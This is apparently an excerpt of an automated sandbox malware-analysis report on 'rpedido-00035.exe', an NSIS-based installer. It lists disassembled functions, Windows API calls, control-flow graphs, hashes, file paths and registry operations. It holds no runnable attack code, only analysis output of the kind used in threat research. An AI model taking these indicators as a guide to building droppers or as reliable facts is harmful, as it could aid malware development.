                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp$C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins$Call
                                                          • API String ID: 1941528284-1066334349
                                                          • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                          • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                          • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                          • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

                                                          Control-flow Graph

                                                          control_flow_graph 677 402644-40265d call 402c15 680 402663-40266a 677->680 681 402abf-402ac2 677->681 682 40266c 680->682 683 40266f-402672 680->683 684 402ac8-402ace 681->684 682->683 685 4027d6-4027de 683->685 686 402678-402687 call 406310 683->686 685->681 686->685 690 40268d 686->690 691 402693-402697 690->691 692 40272c-40272f 691->692 693 40269d-4026b8 ReadFile 691->693 694 402731-402734 692->694 695 402747-402757 call 405f25 692->695 693->685 696 4026be-4026c3 693->696 694->695 697 402736-402741 call 405f83 694->697 695->685 706 402759 695->706 696->685 699 4026c9-4026d7 696->699 697->685 697->695 702 402792-40279e call 4062f7 699->702 703 4026dd-4026ef MultiByteToWideChar 699->703 702->684 703->706 707 4026f1-4026f4 703->707 709 40275c-40275f 706->709 710 4026f6-402701 707->710 709->702 711 402761-402766 709->711 710->709 712 402703-402728 SetFilePointer MultiByteToWideChar 710->712 713 4027a3-4027a7 711->713 714 402768-40276d 711->714 712->710 715 40272a 712->715 716 4027c4-4027d0 SetFilePointer 713->716 717 4027a9-4027ad 713->717 714->713 718 40276f-402782 714->718 715->706 716->685 719 4027b5-4027c2 717->719 720 4027af-4027b3 717->720 718->685 721 402784-40278a 718->721 719->685 720->716 720->719 721->691 722 402790 721->722 722->685
                                                          APIs
                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026EB
                                                          • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040270E
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402724
                                                            • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405F99
                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                          • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                          • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                          • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                          Control-flow Graph

                                                          control_flow_graph 723 40671a-40673a GetSystemDirectoryW 724 40673c 723->724 725 40673e-406740 723->725 724->725 726 406751-406753 725->726 727 406742-40674b 725->727 729 406754-406787 wsprintfW LoadLibraryExW 726->729 727->726 728 40674d-40674f 727->728 728->729
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                          • wsprintfW.USER32 ref: 0040676C
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME$\
                                                          • API String ID: 2200240437-1946221925
                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                          • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

                                                          Control-flow Graph

                                                          control_flow_graph 730 4058e3-40592e CreateDirectoryW 731 405930-405932 730->731 732 405934-405941 GetLastError 730->732 733 40595b-40595d 731->733 732->733 734 405943-405957 SetFileSecurityW 732->734 734->731 735 405959 GetLastError 734->735 735->733
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                          • GetLastError.KERNEL32 ref: 0040593A
                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                          • GetLastError.KERNEL32 ref: 00405959
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 3449924974-3370423016
                                                          • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                          • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                          • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                          • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9

                                                          Control-flow Graph

                                                          control_flow_graph 736 405ed1-405edd 737 405ede-405f12 GetTickCount GetTempFileNameW 736->737 738 405f21-405f23 737->738 739 405f14-405f16 737->739 741 405f1b-405f1e 738->741 739->737 740 405f18 739->740 740->741
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405EEF
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\rpedido-00035.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5), ref: 00405F0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-1269819148
                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                          • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69

                                                          Control-flow Graph

                                                          control_flow_graph 742 10001759-10001795 call 10001b18 746 100018a6-100018a8 742->746 747 1000179b-1000179f 742->747 748 100017a1-100017a7 call 10002286 747->748 749 100017a8-100017b5 call 100022d0 747->749 748->749 754 100017e5-100017ec 749->754 755 100017b7-100017bc 749->755 756 1000180c-10001810 754->756 757 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 754->757 758 100017d7-100017da 755->758 759 100017be-100017bf 755->759 763 10001812-1000184c call 100015b4 call 100024a4 756->763 764 1000184e-10001854 call 100024a4 756->764 780 10001855-10001859 757->780 758->754 765 100017dc-100017dd call 10002b57 758->765 761 100017c1-100017c2 759->761 762 100017c7-100017c8 call 1000289c 759->762 769 100017c4-100017c5 761->769 770 100017cf-100017d5 call 10002640 761->770 776 100017cd 762->776 763->780 764->780 773 100017e2 765->773 769->754 769->762 779 100017e4 770->779 773->779 776->773 779->754 785 10001896-1000189d 780->785 786 1000185b-10001869 call 10002467 780->786 785->746 788 1000189f-100018a0 GlobalFree 785->788 792 10001881-10001888 786->792 793 1000186b-1000186e 786->793 788->746 792->785 795 1000188a-10001895 call 1000153d 792->795 793->792 794 10001870-10001878 793->794 794->792 796 1000187a-1000187b FreeLibrary 794->796 795->785 796->792
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 799 4023de-40240f call 402c37 * 2 call 402cc7 806 402415-40241f 799->806 807 402abf-402ace 799->807 809 402421-40242e call 402c37 lstrlenW 806->809 810 402432-402435 806->810 809->810 811 402437-402448 call 402c15 810->811 812 402449-40244c 810->812 811->812 816 40245d-402471 RegSetValueExW 812->816 817 40244e-402458 call 4031ba 812->817 821 402473 816->821 822 402476-402557 RegCloseKey 816->822 817->816 821->822 822->807 824 402885-40288c 822->824 824->807
                                                          APIs
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000023,00000011,00000002), ref: 00402429
                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402469
                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp,00000000,00000011,00000002), ref: 00402551
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseValuelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp
                                                          • API String ID: 2655323295-3214790736
                                                          • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                          • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                          • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                          • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 825 402d2a-402d53 call 40621d 827 402d58-402d5a 825->827 828 402dd0-402dd4 827->828 829 402d5c-402d62 827->829 830 402d7e-402d93 RegEnumKeyW 829->830 831 402d64-402d66 830->831 832 402d95-402da7 RegCloseKey call 40678a 830->832 834 402db6-402dc2 RegCloseKey 831->834 835 402d68-402d7c call 402d2a 831->835 839 402dc4-402dca RegDeleteKeyW 832->839 840 402da9-402db4 832->840 834->828 835->830 835->832 839->828 840->828
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Close$Enum
                                                          • String ID:
                                                          • API String ID: 464197530-0
                                                          • Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                          • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                          • Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                          • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 926 4015c1-4015d5 call 402c37 call 405d2c 931 401631-401634 926->931 932 4015d7-4015ea call 405cae 926->932 934 401663-40224a call 401423 931->934 935 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 931->935 939 401604-401607 call 405960 932->939 940 4015ec-4015ef 932->940 949 402885-40288c 934->949 950 402abf-402ace 934->950 935->950 955 40165b-40165e 935->955 951 40160c-40160e 939->951 940->939 943 4015f1-4015f8 call 40597d 940->943 943->939 959 4015fa-4015fd call 4058e3 943->959 949->950 952 401610-401615 951->952 953 401627-40162f 951->953 957 401624 952->957 958 401617-401622 GetFileAttributesW 952->958 953->931 953->932 955->950 957->953 958->953 958->957 962 401602 959->962 962->951
                                                          APIs
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405D3A
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                            • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,00000000,000000F0), ref: 0040164D
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins, xrefs: 00401640
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins
                                                          • API String ID: 1892508949-3607167448
                                                          • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                          • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                          • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                          • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                          • CloseHandle.KERNEL32(?), ref: 004059CB
                                                          Strings
                                                          • Error launching installer, xrefs: 004059A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                          • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                          • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
